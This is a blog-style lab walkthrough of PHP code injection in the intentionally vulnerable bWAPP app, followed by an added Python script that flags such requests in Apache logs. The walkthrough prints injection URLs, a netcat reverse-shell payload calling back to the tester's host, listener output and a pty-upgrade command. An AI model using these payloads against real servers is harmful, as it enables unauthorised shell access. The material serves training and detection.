Tuesday, February 4, 2020

bWAPP PHP Code Injection

bWAPP ships an insecure PHP code execution module. Our goal is to reach the vulnerable URL and get a reverse connect shell back using PHP functions.

We test the parameter 'message' for possible code injection at http://192.168.56.101/bWAPP/phpi.php?message=test. One way to do that is to append a semicolon and some PHP instructions and see what the output is. We first try to call the phpinfo() function:

http://192.168.56.101/bWAPP/phpi.php?message=test;phpinfo();

We got phpinfo() to display. Let's move on to executing system commands with PHP's shell_exec().

As you can see, we got back a successful directory listing of the current directory. Our next task is to get a reverse connect going so we have terminal access to the remote host through netcat. Our URL will be http://192.168.56.101/bWAPP/phpi.php?message=test;echo+shell_exec("nc -e /bin/sh 192.168.56.1 8088%");. This should give us a connect back so we can issue commands from the terminal.

sam@ubuntu:~$ nc -nvlp 8088
Listening on [0.0.0.0] (family 0, port 8088)
Connection from 192.168.56.101 49592 received!
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
whoami
www-data
python -c 'import pty;pty.spawn("/bin/bash")'
www-data@bee-box:/var/www/bWAPP$ 

As you can see, we got a connect back and a system shell to work from.
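From the defender's side, the requests above leave an obvious trail in the web server's access log: the 'message' parameter carries a semicolon-separated PHP statement, a phpinfo() call, or a shell_exec() call. The following Python script is an added example (not part of the original post or of bWAPP) that parses Apache combined-format log lines, URL-decodes each query parameter, and flags the injection shapes this walkthrough demonstrates. The log lines are constructed for the example and the indicator regexes are assumptions, written from the payloads shown above.

```python
"""Flag bWAPP-style PHP code injection attempts in Apache access logs.

Added example, not code from the original post or from bWAPP.
The log lines are constructed; the indicator patterns are assumptions
modelled on the payload shapes the walkthrough uses
(semicolon + another statement, phpinfo(), shell_exec()).
"""
import re
from urllib.parse import urlsplit, unquote_plus

# Constructed sample log lines in Apache combined format: one benign request,
# the phpinfo() probe, a shell_exec() payload, and a benign multi-word message.
SAMPLE_LOG = """\
192.168.56.1 - - [04/Feb/2020:10:00:01 +0000] "GET /bWAPP/phpi.php?message=test HTTP/1.1" 200 1532 "-" "Mozilla/5.0"
192.168.56.1 - - [04/Feb/2020:10:00:05 +0000] "GET /bWAPP/phpi.php?message=test;phpinfo(); HTTP/1.1" 200 88213 "-" "Mozilla/5.0"
192.168.56.1 - - [04/Feb/2020:10:00:09 +0000] "GET /bWAPP/phpi.php?message=test%3Becho+shell_exec(%22ls%22)%3B HTTP/1.1" 200 1801 "-" "Mozilla/5.0"
192.168.56.1 - - [04/Feb/2020:10:00:12 +0000] "GET /bWAPP/phpi.php?message=hello%20world HTTP/1.1" 200 1540 "-" "Mozilla/5.0"
"""

# Combined log format: ip ident user [timestamp] "METHOD target PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) '
)

# Heuristic indicators (assumed): a statement separator followed by a further
# statement that makes a call, the phpinfo() probe, and command-execution builtins.
INDICATORS = [
    ("php_statement", re.compile(r';\s*[a-zA-Z_]\w*[^;]*\(')),
    ("phpinfo", re.compile(r'\bphpinfo\s*\(', re.I)),
    ("exec_builtin", re.compile(
        r'\b(shell_exec|exec|system|passthru|popen|proc_open)\s*\(', re.I)),
]


def extract_params(target):
    """Split the query string on '&' only and decode each key/value.

    Splitting is done by hand so that ';' inside a value (the injection
    separator we want to see) is never treated as a parameter separator.
    """
    params = {}
    for pair in urlsplit(target).query.split("&"):
        if not pair:
            continue
        key, _, value = pair.partition("=")
        params.setdefault(unquote_plus(key), []).append(unquote_plus(value))
    return params


def classify_request(target):
    """Return the indicator labels found in any decoded query parameter value."""
    hits = []
    for values in extract_params(target).values():
        for value in values:
            for label, rx in INDICATORS:
                if rx.search(value) and label not in hits:
                    hits.append(label)
    return hits


def scan_log(text):
    """Return one finding per log line whose request carries an indicator."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        hits = classify_request(m.group("target"))
        if hits:
            findings.append({
                "ip": m.group("ip"),
                "ts": m.group("ts"),
                "target": m.group("target"),
                "indicators": hits,
            })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} {','.join(f['indicators'])} {f['target']}")
```

Decoding before matching matters: the third sample line percent-encodes the semicolons and quotes, which is exactly what a browser does to the URLs used in this post, so a rule that greps the raw log for `shell_exec(` would still fire but one keyed on a literal `;` would not. The `php_statement` indicator is deliberately loose and will also flag ordinary text that happens to contain `;` followed by a parenthesised call, so treat it as a triage signal and the builtin names as the high-confidence one.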
